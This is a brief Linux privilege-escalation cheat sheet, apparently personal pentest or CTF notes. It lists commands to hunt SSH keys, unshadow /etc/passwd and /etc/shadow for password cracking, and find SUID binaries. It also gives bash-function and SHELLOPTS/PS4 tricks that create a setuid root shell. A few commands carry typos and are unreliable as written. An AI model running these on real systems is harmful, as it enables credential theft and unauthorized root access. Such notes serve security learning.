2.3 KiB
2.3 KiB
Linux Privilege Escalation
Links
Kernel Exploits
Dirty COW
Stored Keys & Passwords
- History
- Environment Variables
- Config + Dot Files
- SSH keys
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
Permissions
- Weak permissions
- Umask
- Unshadow via
unshadow /etc/passd /etc/shadow > unshadow.txt
and john or hashcat. - SUID
- list
find / -perm /6000 -ls 2>dev/null
Sudo Binary
- Baron Samedit
- CVE-2019-14287
- CVE-2019-18634
- LD_PRELOAD
sudo -l
- Take a look at GTFObins
- Keep an eye on the displayed host and env capabilities
PATH Hijacking
- Interpositioning binaries via PATH
- Look for binaries used in other bins and scripts
- Interposition name and add the directory in front of
$PATH
Bash function
- Interpositioning of binaries via bash functions
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /path/to/binary
- Call binary which invokes this function
Environment Variable
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
Capabilities
Crontab
- Check
cat /etc/crontab
- Check writable scripts and binaries that are scheduled
- Check
$PATH
order